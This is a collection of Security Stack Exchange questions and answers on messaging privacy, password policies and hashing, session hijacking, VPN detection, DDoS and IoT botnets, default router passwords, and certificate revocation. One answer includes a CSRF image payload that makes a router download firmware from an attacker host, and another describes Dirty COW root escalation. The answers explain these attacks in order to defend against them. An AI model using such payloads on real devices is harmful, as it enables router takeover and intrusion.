Signal is currently beta-testing using SGX to have a verifiable upper limit on the tries you get for this. Private Link Preview Signal goes out of its way to hide which URL you're accessing from Signal when generating link previews and to hide your IP from the server. WhatsApp on the other hand has a less stringent stance on the topic, though it is only "worse" than Signal in that regard by leaking the sender's IP to the service. Sender Hiding Signal has a feature that allows you to hide your identity from the server when sending a message. That is, the app can send a message to the server that will be delivered without revealing exactly who it is from. So what the Signal servers see is that somebody with a given IP sent a message to a well specified user. From what I know WhatsApp doesn't implement anything similar and instead relies on user authentication for sending to prevent impersonation and similar issues. Encrypted Profiles In Signal your profile picture and chosen name are only ever transmitted using end-to-end encryption. Also see the introducing blog post. This means that the server doesn't learn what your picture looks like or what string you use to identify yourself to others. In WhatsApp however the picture is less clear. It seems highly likely that if you set this information to public it is indeed stored in the clear on the servers. However if you set it to contacts-only, it is much less clear whether WhatsApp uses its end-to-end encryption for the transport of the image or whether it's just an access-controlled API functionality on the server. At least this (unofficial) blog post claims that the end-to-end encryption is not used for profiles. Receipt Confirmations via the Secure Channel Signal sends the notification that a message has been received using the same secure channel as the message itself. Due to the design of the Signal protocol, this implies a fresh update of the key material. In WhatsApp on the other hand, the receipt notifications are transported outside of this end-to-end protocol. Concretely this means that if only one party in a conversation (or group) talks, a state compromise of that party will allow all subsequent messages of that party to be passively decrypted in WhatsApp, whereas only the messages until the next receipt notification are leakable for Signal. Ephemeral Messages? They're a feature supported both in WhatsApp and Signal - messages that are deleted on the receiver's end after some condition is satisfied. However there's no real security impact from their implementation, as the rule "if you can see it, you can photograph it with a different device" applies. So TL;DR: The remaining security differences (after the protocol update) are mainly that WhatsApp generates a lot of meta data to be convenient while Signal tries to avoid meta data. 1: They don't actually use peer-to-peer communication in the sense of directly connecting to their peers. Rather they use the secure two-way channels to everyone else.
{ "source": [ "https://security.stackexchange.com/questions/139493", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71460/" ] }
139,549
By not accepting my fingerprints and asking for passcode, how is it more secure? I believe checking fingerprints is a more secure way as compared to entering a passcode.
Since iOS 8, full disk encryption is enabled by default and the passcode is used as the key (paired with some secret kept in the phone's HSM so offline bruteforcing is not possible, making it relatively secure even with only a numerical code). For FDE to work we need something consistent as a key. A passcode fits the bill perfectly: it either matches or it doesn't. You also do not need to know the code itself to be able to tell if the entry is correct - a one-way hash will still tell you whether the entry was correct while making it extremely difficult to reverse the process and get the code from the hash. A fingerprint on the other hand is never an exact match. It's always fuzzy and there is a tolerance percentage under which the fingerprint is considered matching, otherwise it's not. Since it's never quite consistent, the hashes we use for passwords are not an option, so you have to keep an entire picture of the fingerprint to be able to tell whether the fingerprint is correct. If someone gets that data it's trivial to make a fake print based on it, whereas with passwords you'd have to bruteforce the hash before you get the actual password. This also means a fingerprint can't be used as a key for FDE, because it will always be a little different on each scan; or, if the fingerprint image is kept somewhere unencrypted for comparison before revealing the real FDE key, then it's insecure because an attacker could just obtain that real key right away (using hardware attacks, exploits, etc.). This is the reason why a passcode is asked for on first boot. It decrypts the data partition and keeps the key cached in RAM, so on subsequent unlocks the partition is already mounted and decrypted, and the lock is purely a software restriction. It would also make sense for the phone to keep fingerprint data on the encrypted partition, which means at boot the phone has nothing to compare your fingerprint against to tell if it's correct or not. Finally, fingerprints are not more secure than passwords because you leave them on everything you touch.
{ "source": [ "https://security.stackexchange.com/questions/139549", "https://security.stackexchange.com", "https://security.stackexchange.com/users/110848/" ] }
139,738
I've spoken to an employee of a big international company in Germany. He said employees are warned if their new password is too similar to the old password (e.g. if they change the password from ThePassword12345 to ThePassword12344). The aim of using hashing functions is to not be able to tell the difference between a password and a random string. As they can tell if the difference is too small, they have to save at least one password in cleartext. The employee said they use Windows/SAP systems (and the warning occurs on all systems). My question is therefore whether my analysis is correct or where my error is. As they also hire lots of computer science people, I would guess the error lies on my side, not theirs.
Usually, when users change their password on a system, they're required to input their old password as well, along with the new password. Now, this old password is hashed and checked against the hash stored in the machine (the password is not stored in cleartext). If the hashes match, then the system proceeds to compare the old password and the new password. If it finds that the two passwords are too similar, it throws an error informing the user. In case the passwords are sufficiently different according to the system logic, the new password is hashed and this new hash value is stored in the system, hence successfully changing the user's password. In case the users are NOT required to input their old password, I'd recommend checking with your IT support team and raising a concern with the system owner... UPDATE: As pointed out in the comments, there's one more way to get around this issue without asking for the user's old password. When the user enters the new password, the system generates variations of the new password entered, hashes each one of them, and compares each hash against the old password's hash. If any of the hashes matches, it throws an error. Else, it successfully changes the password.
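A hedged sketch of that second approach (hashing variants of the new password and comparing them against the stored hash of the old one) might look like this in Python; the variant rules shown are just examples, and a real system would reuse its existing password hashing scheme rather than the PBKDF2 call used here:

```python
import hashlib

def hash_pw(password, salt):
    # Stand-in for whatever hash the system already stores.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)

def simple_variants(new_password):
    yield new_password
    # Nudge a trailing digit up or down: ThePassword12345 <-> ThePassword12344
    if new_password and new_password[-1].isdigit():
        last = int(new_password[-1])
        for d in {(last - 1) % 10, (last + 1) % 10}:
            yield new_password[:-1] + str(d)
    # Drop the last character; more rules (case swaps, etc.) could be added here.
    yield new_password[:-1]

def too_similar(new_password, old_hash, salt):
    return any(hash_pw(v, salt) == old_hash for v in simple_variants(new_password))
```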
{ "source": [ "https://security.stackexchange.com/questions/139738", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83032/" ] }
139,795
In configuring a new system today (Juniper Space, a Linux-based network management platform), I came across a bizarre password requirement that I'm curious about. Upon logging into the web UI with the default credentials, I was prompted to change the password, which is good, and I went to do so, but my randomly generated password was rejected because the last character was a number. This struck me as all the more strange, given that the password I provided for the command line interface ended in a number, and it was accepted. In my experience, password requirements like this generally have some underlying reasoning behind them, like Q and Z not being present on old telephone keypads, or legacy systems compatibility, or just plain poor systems/policies/whatever. I'm having a much more difficult time explaining this particular policy with any of those explanations, though. Does anyone have any insight into the reasoning behind a password policy that would prohibit a numeric last character?
It's likely an effort to discourage passwords that fit common formats or character masks. If a password policy requires use of a number, many people will choose to put their number at the end of a word or words. Here are a couple examples from corporate environments: NetSPI Top Password Masks for 2015 2015 Trustwave Global Security Report - password masks Attackers like this user habit because it makes their hybrid password cracking or guessing attacks easier. They can focus on combining word lists with numbers added to the end rather than a more time consuming brute force approach. So some organizations implement a policy like this in an attempt to improve security by getting users to put their numbers in a less predictable place. It sounds like in your situation they're not combining this with any other complexity checking and instead rejecting all passwords that end in a number, regardless of how random they are otherwise. That's not a very good way to implement this type of checking, but they're not alone in taking this approach.
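As a rough illustration, a less blunt policy check might look for the common "word plus trailing digits" mask rather than rejecting every password that merely ends in a digit; the patterns below are hypothetical examples, not the vendor's actual rules:

import re

# Hypothetical examples of "word plus digits" masks, not the vendor's real rules.
COMMON_MASKS = (
    re.compile(r"^[A-Za-z]+\d{1,4}$"),           # e.g. Password123
    re.compile(r"^[A-Za-z]+\d{1,4}[!@#$%&*]$"),  # e.g. Password123!
)

def fits_common_mask(password: str) -> bool:
    return any(mask.match(password) for mask in COMMON_MASKS)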
{ "source": [ "https://security.stackexchange.com/questions/139795", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11622/" ] }
139,906
Making a strong password AND remembering it is like eating while talking. You choke. So the same thing might happen if you have a p455w0(R).|L1K3thys and someone cracks it. I'm just not sure if it's actually true. Are these leet passwords more crackable than completely random passwords that a random password generator makes? Are there any leet password crackers out there? Is there a way to safely simulate a penetration test on some offline leet passwords?
Cracking libraries do include common Leet substitution algorithms and there are Leet dictionaries which can be used by tools like Hydra. There are also tools to convert an entire dictionary of words to "Leet-speak" More importantly hashes are available for the most common Leet passwords and Leet word variations so if someone is cracking a large password dump of these against a very large set of pre-hashed words which include Leet passwords in use they are very likely to find matches. Finally a better way to determine real-world consequences might be to look at password dumps which have already occurred that also included Leet passwords. The proof of them being cracked is visible in a real world password dumps that have gone public. Likewise their presence in common hash tables (MD5 and SHA1) would also lend likelihood to them being cracked easily.
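To give a feel for how cheap these substitutions are to enumerate, here is a small Python sketch that expands a word into leet variants; real rule engines such as hashcat's are far more extensive:

from itertools import product

# Tiny substitution table; real rule sets (e.g. hashcat rules) are far larger.
LEET = {"a": "a4@", "e": "e3", "i": "i1!", "o": "o0", "s": "s5$", "t": "t7"}

def leet_variants(word: str):
    pools = [LEET.get(ch.lower(), ch) for ch in word]
    for combo in product(*pools):
        yield "".join(combo)

# list(leet_variants("pass")) yields 27 variants, including "p4ss" and "p@$$".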
{ "source": [ "https://security.stackexchange.com/questions/139906", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91474/" ] }
139,952
Given the appropriate XSS vulnerability, an attacker can hijack somebody's session with the data that's passed to and from the server. Why aren't sessions always exclusive to the IP they were started on? i.e., when would a website/service need to persist an authenticated session across multiple IP addresses? I'm not sure why sessions permit this, thus I don't understand how this is ever a feasible route for an attacker.
First, linking a session to an IP address will not make it secure since the server could see many different users as using the same IP address for various reasons (all types of proxy servers, for instance: client, reverse proxy, CDN, etc.). Second, the same user could very well use different IP addresses for the same session. For instance, someone could be switching between networks from the same device. So, since it's not effective and it causes usability and scalability issues, that is not a feature that is usually enabled.
{ "source": [ "https://security.stackexchange.com/questions/139952", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
139,992
Hardened servers, IPS, firewalls and all kinds of defenses cannot solve security problems if people leak information without knowing it, simply because they're misguided. I have already tried to instruct them, but they simply don't care; they cannot see themselves as an important part of our intrusion prevention system. The company deals with sensitive information, but they prefer not to think about it. Our policies are among the best I have ever seen, but no one follows them except the security team. What should I do? Should I throw in their faces the logs of how many attacks my team is dealing with because employees bypass all the security? If my team fails, the telecommunication system of my country can be completely affected. I thought that would be a motivation to take care of security, but no one cares except us, because it's our job. Has anyone already dealt with a situation like this? Should I give up?
High Level Culture In my experience, shifting a security culture takes 3 steps: Get management buy-in to do things differently Get personal management engagement to lead the way on what is important Set the tone through training, media, and in-person events that "people like us do things like this" Here's the thing: management has to be leading the charge on this, with the help of the security champions. Management has to want, and encourage, the technical controls to apply to themselves. If management gets special conditions, game over. Get a manager, the higher up the better, to personally and publicly express their desire to participate in a properly secure environment. Get them to express the frustrations and inconveniences, too. But also communicate that the inconveniences are important for the health of the company. "I grumble on the mornings when I'm prompted to change my password. I think, I changed it just [1|3] months ago! But, I know that when I do, I'm cutting off a hacker's route to using my credentials to harm me and this company" [yes, I am aware of the controversy about frequent password changes, but roll with the example for a second] Then, once you have this great foundation, start bringing that message down to the personal level for everyone. Teach Them to Secure Themselves It can be easy for people to see company policy as disconnected from reality (have you filled in your TPS reports?). So pushing hard on company security can be a losing battle. Instead, consider teaching people how to secure themselves and their families. Show how hackers have and do compromise home computers and mobile devices. By doing this, you get them to really see the dangers involved. Once you have this buy-in, then it is much easier to shift the focus to dangers at work. Get Some Teeth If everyone is getting along with the policies, then that's great, but you need to have some worst-case consequences for people who do not comply. This is a tricky subject and you need to work with HR, GRC, and management to make this work.
{ "source": [ "https://security.stackexchange.com/questions/139992", "https://security.stackexchange.com", "https://security.stackexchange.com/users/125067/" ] }
140,064
After I received dozens of spam mails over the last year with my trashmail (used for "You must log in once to check out this product.."-sites, etc.) I noticed they were mostly translated horribly (if they were translated at all). I thought about that after reading the Wikipedia article about the ransomware "Locky", where the spam message pattern was shown. Dear (random name): Please find attached our invoice for services rendered and additional disbursements in the above-mentioned matter. Hoping the above to your satisfaction, we remain Sincerely, (random name) (random title) Referring to my experience, only a few mails were translated well enough to even pass as my native tongue (German, by the way). So, I was wondering if non-English users are theoretically better protected from international scam/phishing than native speakers. Of course there are a lot of properly translated versions out there, or the spammers are also based in the same country, but my inbox is dominated by non-German spammers. Or would you (as a 'normal' user) trust a [insert random title here] who can't properly speak your native language and therefore sounds like Master Yoda with dyslexia? Or if it was in English, I'd wonder "Why the heck would a [insert random country I've never heard of] lawyer write to me in English?" I believe these users are a bit safer, as phishing is mostly about gaining the victim's trust. I'm interested in whether this thesis is true. Edit: It's awesome to see how multifarious the answers and comments are. Kudos to the Stack InfoSec community.
There is a really, really good paper on this here. Tl;dr: 95% of spam is in English; in Germany, for example, only 17% of the spam is in German; in Scandinavia it's less than 1% in the local language. Conclusion I: Yes, generic phishing is mostly directed at English-speaking people. I can only confirm that many German people will not even consider opening a mail with a non-German subject. Conclusion II: The main factor for the phishers will be gaining proficiency in the target language. Target languages are English and other "first world" languages, but they vary in how hard they are to learn. Since it's much easier to auto-translate and learn basic English than, for example, Icelandic, phishing will be much less effective on non-English speakers. But: Spear phishing is much more dangerous and will always be done in the local language, so statistics can't take that into account.
{ "source": [ "https://security.stackexchange.com/questions/140064", "https://security.stackexchange.com", "https://security.stackexchange.com/users/108679/" ] }
140,217
Can't an attacker just change his/her session (or cookie because it's stored locally) information then fool the server that he's the legitimate user? Say for example, if a website uses the database id as an identifier, the attacker logs in to his account to get his cookie. Then just modify his ID to impersonate another legitimate user.
Yes, if you can guess another user's session key then you can become them. This is why you need to have an unpredictable session key that can be revoked. There have been cases where best practices haven't been followed; for example, Moonpig produced an API which used a session key that was the user's ID, which is assigned at account creation as a consecutive number. This meant that you could be any user. If that user wanted to stop you, they couldn't, as it is the key for all the sessions they are engaged in and can't be changed, as it is the unique ID for them within the Moonpig database. This is a really good example of how to do it wrong. Session keys should be unpredictable and able to be thrown away (possibly allowing one user to have many session keys). As @Mindwin mentioned in the comments, the session key should be in the HTTP payload (cookies or form data [best practice is in cookies]) and not in the URL. This is because having session data in the URL means you have to put it in the URL of every link, it stops you from persisting a session if the user leaves and comes back, copying the URL and sending it to someone gives them your session data, and there is a limit to how many characters a URL can contain. You should also use HTTPS wherever possible so that an attacker can't snoop on the HTTP payload and get a copy of the session key that way (this is how Firesheep worked).
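For contrast, here is a minimal sketch of how an unpredictable, revocable session key can be generated (Python's secrets module; the storage scheme described in the comments is an assumption for illustration):

import secrets

def new_session_token() -> str:
    # ~256 bits of randomness, URL-safe, infeasible to guess.
    return secrets.token_urlsafe(32)

# Store token -> user server-side; deleting that record revokes the session
# without touching the user's identity or any of their other sessions.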
{ "source": [ "https://security.stackexchange.com/questions/140217", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123975/" ] }
140,418
I heard about Dirty COW but couldn't find any decent writeup on the scope of the bug. It looks like the exploit can overwrite any non-writable file, which makes me guess that local root is possible via substitution of SUID programs. Is that right? What else do we know about Dirty COW? Is it possible to exploit it remotely? Does it affect Android?
It can't be exploited remotely without another vulnerability. You need to be able to execute commands on the system already. A classic example would be a web shell. Say the server is running a web application which has a vulnerability allowing you to upload a web shell or otherwise execute system commands. These commands will typically be executed as a low-privileged user, sometimes called www-data or similar. With this exploit you could overwrite the file /etc/passwd to give www-data the UID 0. Now www-data has root privileges. However, I tried a few things and modifying /etc/passwd didn't work on my system. You can set the UID of a user to 0, but then you'd have to re-login, which isn't really an option if you only have a web shell. The best weaponized exploit I've seen so far overwrites /usr/bin/passwd , the binary which is used to change a user's password and has the SUID bit set, with shellcode that executes /bin/bash . Some limitations of the exploit seem to be: You can only overwrite existing bytes, not add anything to a file. I was also not able write more than exactly 4KB to a file. As for affecting Android, I searched the Android 4.4 git repo for the function in question ( follow_page_pte ) and got no hits, so I want to say "no", but don't quote me on that. Edit: Android is affected - see this proof of concept .
{ "source": [ "https://security.stackexchange.com/questions/140418", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15648/" ] }
140,437
In corporate environments, security examiners use filters & firewalls to block VPN connections for security purposes. VPN traffic is distinguishable, and that's also the reason why OpenVPN doesn't work over the Great Firewall of China. Then why don't VPN channels use TLS? It would then become impossible to predict which traffic belongs to the VPN server, as most of the traffic crossing the filter is HTTPS, which the filter has to allow.
There are a few things to understand. The first is that most VPN tools were originally designed to provide private connectivity over networks that were insecure, possibly NATted or firewalled, but not actively hostile to VPNs. The second is that traditional TLS is a wrapper over TCP. TCP is a poor choice for VPNs because it suffers from "head of line blocking": if one packet gets lost then all the data behind it is blocked until it is successfully retransmitted. This used to cause big problems when running VPNs over TCP; it's less of an issue now that we have TCP fast retransmission, but it's still less than ideal. The third is that deep packet inspection is a fairly new thing. Networks that will pass legitimate TLS traffic unmolested but will not pass other traffic on port 443 are still the exception, not the rule. While OpenVPN does have a TCP option, it is primarily designed to run over UDP. It uses TLS for key exchange but encrypts the actual network packets using a system designed explicitly for that purpose. https://openvpn.net/index.php/open-source/documentation/security-overview.html Someone should say something about DTLS (TLS over UDP) too: DTLS is a pretty new protocol. I see no reason why you couldn't/shouldn't build a VPN solution on top of it, but I guess the VPN software vendors aren't especially in the mood to redesign their software. In any case, it wouldn't help with the scenario described in the question.
{ "source": [ "https://security.stackexchange.com/questions/140437", "https://security.stackexchange.com", "https://security.stackexchange.com/users/118310/" ] }
140,490
I'm a moderator of a major bulletin board. When a baddie shows up, we block their IP address; it works, at least until they find a new one. Why can't a protocol be developed for the world's routers to combat DDoS, whether by IP addresses or message content or something else, to stop DDoS in its tracks? There's clearly an answer, or else it would have already been done. Can someone give an executive summary of why it can't be done? E.g., it would require some central authority that doesn't exist.
Let's say that you run a shop. Every day, you might get a few hundred customers. One day, you get tens of thousands of people coming in, who get in the check-out line, buys a trinket, and then gets right back in line to repeat. Obviously, you are losing business from authentic customers who must wait hours in line. Now, you hire a security guard at the entrance to verify that these customers satisfy some criteria. However, there's still tens of thousands of people who want to get in. The only difference is that now, everyone must go through security. You notice that, from the authentic customer's perspective, you still wait hours in line, just that now it's just to get through security!
{ "source": [ "https://security.stackexchange.com/questions/140490", "https://security.stackexchange.com", "https://security.stackexchange.com/users/128249/" ] }
140,584
Why are the recent DDoS attack against DNS provider Dyn, and other similar attacks successful? Sure a DDoS attack can bring an entity down, and if that entity controls DNS servers then queries to those nameservers will fail, and domains listed under those nameservers will not be reachable by any host that doesn't already have IP information for them. But since browsers cache DNS records, many hosts will already have IP information for those domains (at least until their cache entries expire) and therefore the fact that the nameservers are down shouldn't matter to the hosts with caches. But this does not appear to be the case: during yesterday's attack I was unable to access github, npm, etc.
You are correct that the DNS cache would mitigate against a nameserver being unavailable. It is extremely common to have a TTL of 5 minutes or lower. Hence, 5 minutes after the DDOS attack brought down Dyn, your cache would've been invalid and you wouldn't have been able to hit github, etc.
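If you want to see how long a record would survive in caches once the authoritative nameservers go down, you can inspect the TTL your resolver returns; a small sketch assuming the dnspython package (version 2 or later):

import dns.resolver

answer = dns.resolver.resolve("github.com", "A")
print("TTL in seconds:", answer.rrset.ttl)   # how long caches may keep it
for record in answer:
    print(record.address)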
{ "source": [ "https://security.stackexchange.com/questions/140584", "https://security.stackexchange.com", "https://security.stackexchange.com/users/109969/" ] }
140,635
I used to go on a site called blockchain.info for storing bitcoins, but today when I entered the URL I was redirected to a phishing page. I entered all my information and it was obviously sent to the phisher. When I realised it was a phishing page, I directly reported it to Blockchain and changed my password. My question is: is it illegal to DDoS their site? I live in KSA if that helps. Here is the phishing page: http://lblockclhain.info/us/login.htm
If you do a DDoS by sending large amounts of traffic to that site, you're very likely creating a lot of collateral damage, since other services in (parts of) the network will suffer as well if the network is saturated. Also, very often phishers use hacked websites (for example poorly managed and outdated WordPress installs) to host their phishing sites, so you're not just attacking the phisher, but also a (mostly) innocent victim of that phisher. And as others pointed out, just as in 'the real world' (which this is just as much a part of), you shouldn't take matters into your own hands. The right thing to do is either complain to the owner of the site or the network hosting it, or report it to the website being phished. Banks especially often have dedicated teams (or hire companies) which are specialised in taking down phishing sites. In addition: you must consider that, when you are DDoS'ing a website, you're not attacking the website "per se" but the whole server, so you're causing damage to the web hosting server (which may propagate to other websites hosted on the same server). Finally: most laws in most countries consider it illegal to launch any cyber-attack, no matter whether it is against a legal or illegal target.
{ "source": [ "https://security.stackexchange.com/questions/140635", "https://security.stackexchange.com", "https://security.stackexchange.com/users/128400/" ] }
140,720
In this hypothetical scenario, there's an input for one username, and there are two separate password fields. A user must have two separate passwords that they must enter before they can login. Would this have any benefit over a single password that's the length of password one and two combined? (I'm not concerned about ease of use for the user here)
I agree with the other answers: It add no or little entropy compared to just using a longer password (as Steffen Ullrich points out ). If you hash the passwords separately, it makes the hashes easier to crack compared to one hash of a long password (as lengyelg points out ). But I would like to add one point related to user behaviour. Forcing the user to pick two passwords instead of one will probably make the user pick worse passwords out of pure exhaustion. You will just encourage people to repeat the same password twice with some modification to evade any blocks you put in place to prevent this. When you factor in the human picking the passwords I think you end up being less secure, not more. It is just annoying without any security benefits at all at best, and directly harmful to security at worst.
{ "source": [ "https://security.stackexchange.com/questions/140720", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102634/" ] }
140,760
I completely understand how IoT devices were used in the massive DDoS attacks because they are easily manipulated due to lack of firewalls, default passwords, etc. What I don't understand is although easily hacked, most IoT devices are connected to secured private wifi networks. Here's the question: So is it assumed that these thousands of IoT devices' networks were hacked first, then the device itself was hacked?
The devices are designed to be accessible from outside the home. To offer this service to their owners, they make themselves accessible through the homeowner's router/firewall. The way they do this is by sending a UPnP packet to the owner's router that tells the router to open a port that connects back to them. They then listen for connections that arrive directly from the internet. In other words, the devices first hacked their owner's routers by design, which exposed their own vulnerabilities. (This has nothing to do with secured, private, or open WiFi, other than many IoT devices connect via WiFi; UPnP exposes the exact same vulnerabilities on wired devices connected by Ethernet cables, too.) To protect yourself, disable UPnP on your router.
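If you want to see which devices on your own LAN speak UPnP at all, here is a rough sketch of an SSDP discovery probe using plain Python sockets (run it only on a network you own; devices that answer are the ones that could be asking your router to open ports on their behalf):

import socket

# SSDP M-SEARCH probe to the standard UPnP multicast address.
MSEARCH = (
    "M-SEARCH * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    'MAN: "ssdp:discover"\r\n'
    "MX: 2\r\n"
    "ST: upnp:rootdevice\r\n\r\n"
).encode()

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(3)
sock.sendto(MSEARCH, ("239.255.255.250", 1900))
try:
    while True:
        data, addr = sock.recvfrom(4096)
        print(addr[0], data.split(b"\r\n")[0].decode(errors="replace"))
except socket.timeout:
    pass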
{ "source": [ "https://security.stackexchange.com/questions/140760", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71041/" ] }
141,000
It was reported that the recent large scale DDoS attack affecting multiple websites in the US was done by hacking 10s of millions of devices and using them for the attack. How can one in general know if ones devices were hacked and used in the/an attack?
Knowing after the fact can be a bit difficult if you are not actively monitoring your network traffic. But there are some things you can do now to determine if you were at risk of being a participant and to mitigate against future participation. As has been mentioned in a number of places, if your WAN router/bridge/cablemodem/firewall has uPnP turned on, you've definitely opened up your local network to risk. You should turn this off. For your various devices, if you've left the default administrator password set, you've left yourself open. Change this. Make sure the firmware on your devices is up to date and expect further updates to come out in the near future. If you have devices that don't need to communicate on the Internet to "call home," then block them from doing such things; don't give them a default route, add firewall rules, etc. By most accounts, CCTV (e.g. web cams) were the primary devices infected and utilized. If you have such a device and a list of know offenders can be found here (https://krebsonsecurity.com/2016/10/who-makes-the-iot-things-under-attack/) , you might consider taking some action.
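As a crude, illustrative check for the telnet exposure that the Mirai botnet abused, something like the following connect scan of your own subnet can help (adjust the prefix to match your network, and only scan networks you are authorized to scan):

import socket

def scan_telnet(prefix: str = "192.168.1.", ports=(23, 2323)) -> None:
    # Serial and slow, but dependency-free; adjust the prefix to your subnet.
    for host in range(1, 255):
        ip = prefix + str(host)
        for port in ports:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(0.3)
            if s.connect_ex((ip, port)) == 0:
                print("telnet open on", ip, "port", port)
            s.close()

scan_telnet()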
{ "source": [ "https://security.stackexchange.com/questions/141000", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10435/" ] }
141,157
There are a lot of articles addressing the dangers of default router admin passwords . Certain security applications will also detect default router admin passwords as a vulnerability. However, these articles all focus on what could possibly happen if your router was compromised. But suppose we have a router configured such that the admin panel is only open to the local network. Furthermore, suppose that the password to connect to the network (i.e. via wifi) is sufficiently secure (i.e. very high entropy), and only trusted users are allowed on the network. Under these conditions, could the router still be compromised? Is there still a need to change the default router admin password? My thoughts are that if an attacker can't get into the network, they can't compromise the router regardless of the router's admin password. CSRF is a possibility, but that can be defended against with CSRF token. Are there any other possibilities I haven't considered?
Is it dangerous to use default router admin passwords if only trusted users are allowed on the network? Yes, it's dangerous. Here are a few more "technical" ways to do it (other than saying it's bad): 1. No CSRF Protection You could be happily visiting a website, and there could be any number of issues with it: The website itself was haxored and has malicious content inserted in it, or; Any of the elements on the page have been MITM in the middle attacked (shut up, I'm trying to be funny) and have had elements intercepted with The Thing(tm), and; CSRF attack was inserted by style, img, link, or anything else: Rough example: <img src="http://admin:[email protected]/updateFirmware.cgi?file=hxxp://hax.com/hax.bin&confirmUpgrade=true"/> In many cases, the CSRF protection won't help if you can log in with admin:admin@routerip through a link like that. It will create a new session and token for you instead of using your current one. Congratulations on your newest installation of Router Backdoor(tm) with full shell access. 2. CSRF protection exists, but not Proper XSS Protection Escape context and insert hax.js , or just JS code which could perform the following functions: Steal CSRF token with javascript See <img src=""/> above. Also, .svg images can bypass a lot of XSS protection. 3. Router configuration page is accessible via the wireless network? Someone logs in to your wireless network, visits the router configuration page and makes necessary changes/upgrades the firmware/redirects DNS/whatever they want. Like the first one, but with a point-and-click interface instead. 4. Other ways Disgruntled employees If anyone finds their way on your network through another compromised machine, they can use that machine to compromise your router and then you're boned. Keep in mind, XSS/CSRF attacks could exist, or even be added during upgrades, if the vendor is crap. So don't do it. Please. My heart can't take it. :(
{ "source": [ "https://security.stackexchange.com/questions/141157", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87241/" ] }
141,250
I just learned a few things about hashing algorithms – MD5 and SHA-1. So, if I am not wrong passwords are hashed so that in a rare situation of your database being compromised a hacker can not see all the passwords in your database as the passwords are hashed. MD5 is not safe anymore as most of the common passwords and their hashed values are out on the internet. And hence people now use other hashing algorithms. So, my questions are : Is hacking a database that easy? I mean instead of finding new ways to hash, why can't they make their database more secure or "hack-proof"? If a hacker manages to hack into some database, why would he want to know the hashed passwords? I mean he can change other columns of data. For example, he could search for his username and increase his bank balance. So, shouldn't all the fields be hashed?
Some things first: Forget about MD5 immediately. It's old and weak. Ideally, forget about SHA1 too. There are SHA2 and SHA3. These hash algorithms in their pure form are useful for many things, but not for passwords. Use them in combination with e.g. PBKDF2, or use bcrypt (and don't forget salting). So, if I am not wrong passwords are hashed so that in a rare situation of your database being compromised a hacker can not see all the passwords in your database as the passwords are hashed. Correct. While this won't help make your server more secure (after all, it's already compromised in such a situation), it prevents, e.g., the attacker from using the passwords on other sites. Sadly most people use one password for multiple things. Is hacking a database that easy? I mean instead of finding new ways to hash, why can't they make their database more secure or "hack-proof"? You could (and you should). But: Even with all your efforts, there always is some chance the attacker can get access. Bugs in software and devices you don't know about and/or you can't fix, and many more things. Often you can't give your best because of managers who don't think security is important, have no budget for it etc. If a hacker manages to hack into some database, why would he want to know the hashed passwords? I mean he can change other columns of data. For example, he could search for his username and increase his bank balance. So, shouldn't all the fields be hashed? If all fields are hashed, the database is useless for you too; so you can't do that. Remember, a good hash can't be reversed. As said above, as soon as your DB/server is compromised, the damage for you has already happened. The hashed passwords just prevent the attacker from getting access to other accounts of your users too (and then some users would sue you, so hashing helps you too).
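For illustration, a minimal example of salted password hashing with PBKDF2 from Python's standard library; bcrypt, scrypt or Argon2 are equally valid choices:

import hashlib
import hmac
import os

def hash_password(password: str, iterations: int = 200_000):
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, iterations, digest          # store all three alongside the user

def verify_password(password: str, salt: bytes, iterations: int, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, digest)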
{ "source": [ "https://security.stackexchange.com/questions/141250", "https://security.stackexchange.com", "https://security.stackexchange.com/users/128915/" ] }
141,262
I'm working on an indicator for Ubuntu, and one of the tasks it's supposed to perform is chmod -x and chmod +x a specific root-owned binary ( /usr/lib/x86_64-linux-gnu/notify-osd to be precise). As far as I understand, my options are: run command with pkexec each time ( which I kind of want to avoid for the sake of user experience ); since the indicator is in python, I could have a binary with setuid bit set written in C. However, I've been told this approach is frowned upon; start a "proxy" which will run as root and only perform that one specific task , and the indicator will communicate with that "proxy" My question really is , which approach would be best in terms of security AND user experience ? How should I approach implementing an app that needs one, very specific task to be done as root , and the rest - as regular user.
{ "source": [ "https://security.stackexchange.com/questions/141262", "https://security.stackexchange.com", "https://security.stackexchange.com/users/121824/" ] }
141,311
Am I right in my conclusion that validation of a certificate by a client that wishes to communicate with a server offering said certificate is done completely locally? As in, the client is supposed to have all information (e.g. the CA's public key, used to sign the server's certificate) already locally available? The exceptions being, I think, comparing the IP address/DNS information offered through the certificate with the real-world server's address and domain name. An answer in another question ( SSL Certificate Trust Model ) in fact explicitly states "In fact that's the whole idea of certificates: to allow offline validation.". Is that true?
It is almost true. :) But not entirely. A certificate can be revoked in case of a compromise. The only way to discover if a certificate is revoked at any given time is basically contacting the CA that issued it. Any info signed in the certificate itself (fit for offline validation) will be valid for a revoked cert. There are two protocols for checking revocation, CRL and OCSP. A CRL is just a list of revoked certificates published by the CA, and OCSP is kind of a web service, but the idea is the same, any client doing cert validation should have a look and check if the certificate happens to be revoked. In fact, a fairly common flaw in cert validation implementations is that they don't check revocation.
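To see where a client would have to go for that online revocation check, you can read the OCSP and CRL URLs embedded in a server's certificate; a sketch assuming Python with the cryptography package (a recent version):

import ssl
from cryptography import x509
from cryptography.x509.oid import AuthorityInformationAccessOID, ExtensionOID

# Fetch the server's certificate and read the revocation-related URLs from it.
pem = ssl.get_server_certificate(("example.com", 443))
cert = x509.load_pem_x509_certificate(pem.encode())

aia = cert.extensions.get_extension_for_oid(
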